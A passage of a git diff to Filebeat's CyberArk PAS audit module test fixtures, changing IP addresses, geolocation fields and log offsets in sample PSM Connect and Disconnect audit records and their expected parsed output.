System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:28</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 07:08:28",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm connect",
@@ -1251,7 +1160,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 38754,
+        "log.offset": 38700,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1261,24 +1170,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1310,23 +1216,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:11:09Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:11:09</Timestamp>\n    <IsoTimestamp>2021-03-15T14:11:09Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:11:09</Timestamp>\n    <IsoTimestamp>2021-03-15T14:11:09Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 07:11:09",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm connect",
@@ -1347,7 +1248,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 42532,
+        "log.offset": 42472,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1357,24 +1258,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1406,23 +1304,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "8b222ac9-c2ad-49ea-9c4e-6829940f58d4",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-16T10:04:51Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Connect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 03:04:51</Timestamp>\n    <IsoTimestamp>2021-03-16T10:04:51Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 03:04:51</Timestamp>\n    <IsoTimestamp>2021-03-16T10:04:51Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 16 03:04:51",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm connect",
@@ -1443,7 +1336,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 46310,
+        "log.offset": 46244,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1453,24 +1346,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log b/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log
index c172f644c9f3..6a66f8b7a52a 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log
@@ -1,16 +1,16 @@
 {"format":"elastic","version":"1.0","raw":"<syslog>\n  <audit_record>\n    <Rfc5424>no</Rfc5424>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.6.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>Linux</Safe>\n    <File>Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2</File>\n    <Station>10.2.0.7</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"LINUX-SSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"admin2\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"radiussrv.cyberark.local\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"No Reason\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"Customer\" Value=\"Tesla\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n</syslog>","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"302","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}}
-<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:26</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:47:01</Timestamp>\n    <IsoTimestamp>2021-03-11T17:47:01Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:40</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:40Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 